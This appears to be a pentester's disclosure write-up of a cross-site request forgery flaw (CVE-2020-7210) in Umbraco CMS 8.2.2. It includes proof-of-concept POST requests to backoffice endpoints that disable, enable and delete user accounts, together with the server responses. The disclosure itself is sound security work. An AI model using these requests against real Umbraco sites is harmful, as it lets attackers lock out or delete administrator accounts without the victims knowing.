CSRF at Umbraco CMS

Cross-site request forgery can be used to make arbitrary web requests to the Umbraco CMS content management system and identify its users without their knowledge. Such an attack always requires interaction with the user, but, as a rule, it is enough for the victim to follow a specially prepared link or visit a web page that is under the control of an attacker. This makes it possible to activate, deactivate or completely delete user accounts. As a result, a threat arises. Dos-attack on accounts.

Background

During testing, a small penetration resource was detected CSRF-vulnerability in fresh on that moment Umbraco CMS. This vulnerability allowed to activate, deactivate, or completely delete user accounts, including those with administrative privileges.

Despite the fact that in the latest OWASP Top Ten 2017 report, CSRF vulnerabilities left the list of the 10 most critical, it is too early to discount them.

The vulnerability was tested on version 8.2.2; in version 8.5, it has already been fixed, but it is possible that other versions prior to it remain vulnerable. It is strongly recommended that users of this product immediately upgrade to the latest available version.

Proof of concept

In the event of a real attack, the following HTML document will be placed on a malicious website controlled by an attacker.

Example 1: HTML to disable a user

A request that is sent to the server on behalf of the victim:

POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1
Host: 
[...]
Cookie: 

The response received from the server:

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: 
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"}

Example 2: HTML to enable a user

Inquiry:

POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1
Host: 
[...]
Cookie: 

Answer:

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"}

Example 3: HTML to delete a user

Inquiry:

POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1
Host: 
[...]
Cookie: 

Answer:

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: 
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close

)]}',
{"notifications":[{"header":"User  was deleted","message":"","type":3}],"message":"User  was deleted"}

The victim receives a response from the server in the format Json (clickable screen).

As soon as an authenticated victim (administrator) visits a website with embedded malicious HTML, active malicious content begins to execute in the context of the victim’s session. Although the answers to these requests are not delivered to the attacker, in many cases it will be enough for him to jeopardize the integrity of the victim’s information stored on the site, or to perform potentially compromising requests to other sites.

Instead of a conclusion

Although more and more attacks have recently gone to Server-Side from Client-Side, they still need to be given due attention. After talking with the client, we quickly contacted the software product vendor and received information about the correction. The vulnerability was assigned the CVE-2020-7210 index. I admit, for me as a pentester, this is the first vulnerability to receive the CVE index.